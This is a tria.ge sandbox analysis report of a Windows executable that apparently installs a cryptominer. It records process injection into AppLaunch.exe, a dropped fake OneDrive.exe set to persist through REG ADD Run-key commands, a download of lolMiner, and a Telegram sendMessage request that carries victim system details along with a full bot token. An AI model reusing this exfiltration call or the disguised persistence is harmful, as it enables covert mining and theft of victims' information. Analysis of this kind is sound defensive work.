Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

JaffaCakes...ce.exe

windows7-x64

7

JaffaCakes...ce.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    25/12/2024, 14:04 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe

  • Size

    6.6MB

  • MD5

    a4ac4ea53e40133a5295125f42b8f44b

  • SHA1

    23515fa205d9552ff9be7c97e4779051e8d3efd6

  • SHA256

    5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce

  • SHA512

    a22a828f23b4add05183c3ae0f3f2fff76991e098b343a2cf34b02d70be72d8d89812ee348f6a0db642450ff29e831d1ff3ff59d427428f737a31bb98b8a874c

  • SSDEEP

    196608:Qv4oFqOMRr29c9lNxQp2QzenyEUBiI+8WO82a3EXfyoo6Y8W/W:i4oFqth9vxQp20TV/8r3cfyos8

Score
7/10
discoverypersistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_5ebf6cdead494355e097f0664095b66cab6719a7eebd72aa9f605250aafc95ce.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2916 -s 752
          4⤵
          • Loads dropped DLL
          PID:296
      • C:\Windows\SysWOW64\REG.exe
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2764
      • C:\Windows\SysWOW64\REG.exe
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2792

Network

  • flag-us
    DNS
    ipinfo.io
    AppLaunch.exe
    Remote address:
    8.8.8.8:53
    Request
    ipinfo.io
    IN A
    Response
    ipinfo.io
    IN A
    34.117.59.81
  • flag-us
    GET
    http://ipinfo.io/json
    AppLaunch.exe
    Remote address:
    34.117.59.81:80
    Request
    GET /json HTTP/1.1
    Accept: text/*
    User-Agent: soft
    Host: ipinfo.io
    Response
    HTTP/1.1 200 OK
    access-control-allow-origin: *
    Content-Length: 253
    content-type: application/json; charset=utf-8
    date: Wed, 25 Dec 2024 14:04:50 GMT
    x-content-type-options: nosniff
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
  • flag-us
    DNS
    github.com
    OneDrive.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.26.156.215
  • flag-us
    DNS
    api.telegram.org
    AppLaunch.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-gb
    GET
    http://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip
    OneDrive.exe
    Remote address:
    20.26.156.215:80
    Request
    GET /Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip HTTP/1.1
    Accept: text/*
    User-Agent: soft
    Host: github.com
    Response
    HTTP/1.1 301 Moved Permanently
    Content-Length: 0
    Location: https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip
  • flag-nl
    GET
    http://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A
    AppLaunch.exe
    Remote address:
    149.154.167.220:80
    Request
    GET /bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A HTTP/1.1
    Accept: text/*
    User-Agent: soft
    Host: api.telegram.org
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.18.0
    Date: Wed, 25 Dec 2024 14:04:51 GMT
    Content-Type: text/html
    Content-Length: 169
    Connection: keep-alive
    Location: https://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A
  • 34.117.59.81:80
    http://ipinfo.io/json
    http
    AppLaunch.exe
    303 B
     654 B
     5
    3

    HTTP Request

    GET http://ipinfo.io/json

    HTTP Response

    200
  • 20.26.156.215:80
    http://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip
    http
    OneDrive.exe
    376 B
     252 B
     5
    2

    HTTP Request

    GET http://github.com/Lolliedieb/lolMiner-releases/releases/download/1.48/lolMiner_v1.48_Win64.zip

    HTTP Response

    301
  • 149.154.167.220:80
    http://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A
    http
    AppLaunch.exe
    833 B
     1.9kB
     6
    4

    HTTP Request

    GET http://api.telegram.org/bot5397253827:AAGDFbNDI3IrTWiMj9-eGwgt3QRm-m4WnIg/sendMessage?chat_id=-674705435&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Standard%20VGA%20Graphics%20Adapter%0A%E2%80%94%20CPU:%20Intel%20Core%20Processor%20(Broadwell)%0A%E2%80%94%20RAM:%202047%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20Admin%0A%E2%80%94%20IP:%20181.215.176.83%0A%E2%80%94%20Country:%20GB%0A%E2%80%94%20Build%20tag:%20bebrik1%0A

    HTTP Response

    301
  • 20.26.156.215:443
    github.com
    OneDrive.exe
    190 B
     92 B
     4
    2
  • 149.154.167.220:443
    api.telegram.org
    tls
    AppLaunch.exe
    397 B
     219 B
     5
    5
  • 149.154.167.220:443
    api.telegram.org
    tls
    AppLaunch.exe
    359 B
     219 B
     5
    5
  • 149.154.167.220:443
    api.telegram.org
    tls
    AppLaunch.exe
    288 B
     219 B
     5
    5
  • 149.154.167.220:443
    api.telegram.org
    AppLaunch.exe
    190 B
     92 B
     4
    2
  • 8.8.8.8:53
    ipinfo.io
    dns
    AppLaunch.exe
    55 B
     71 B
     1
    1

    DNS Request

    ipinfo.io

    DNS Response

    34.117.59.81

  • 8.8.8.8:53
    github.com
    dns
    OneDrive.exe
    56 B
     72 B
     1
    1

    DNS Request

    github.com

    DNS Response

    20.26.156.215

  • 8.8.8.8:53
    api.telegram.org
    dns
    AppLaunch.exe
    62 B
     78 B
     1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\08s5oRQXAhuUIo_s
    Filesize

    215B

    MD5

    c48d171e301f77a3277b41f67834adf7

    SHA1

    0adf07159363866cddf94887eb1b74b9d0379279

    SHA256

    f8dbb84201032c8b6f1ff2de441c3867223af89200e759cc1d7cd00bd8475ad5

    SHA512

    7188011d238f06db092237f7c9e737f7f7783d66f3841eb97454dd8a06f353ea5e13da52b8757bc56560d3336aa2eecf353598b88f5ff572695e58b74aa9d70d

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
    Filesize

    175KB

    MD5

    f3af73070387fb75b19286826cc3126c

    SHA1

    7774854137d7ada89f3b4bdf67631456a1e74853

    SHA256

    974243f2487ceeb8eeea6aa8fee215f15c7b204382d4bd12f469f712f56c3610

    SHA512

    a620583b2d89e3f0350ae4d5dfe2b2c160d2f982b29dea6b8e273bb39ab2d1d91a2452238e9c30cdd7151aa555e231e1ac9930f9d76f6ff80504eacb25fa557a

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Secur32.dll
    Filesize

    316KB

    MD5

    fed6517a5f84eecc29edee5586d7feeb

    SHA1

    56df244bf73c7ec7b59c98e1f5d47b379b58a06b

    SHA256

    5075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6

    SHA512

    45cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642

    Download Submit

  • memory/2840-1-0x0000000000AE0000-0x0000000000BE0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/3060-9-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3060-11-0x0000000000400000-0x00000000004CA000-memory.dmp

    Filesize

    808KB

    Download

  • memory/3060-4-0x0000000000400000-0x00000000004CA000-memory.dmp

    Filesize

    808KB

    Download

  • memory/3060-2-0x0000000000400000-0x00000000004CA000-memory.dmp

    Filesize

    808KB

    Download

  • memory/3060-12-0x0000000000400000-0x00000000004CA000-memory.dmp

    Filesize

    808KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.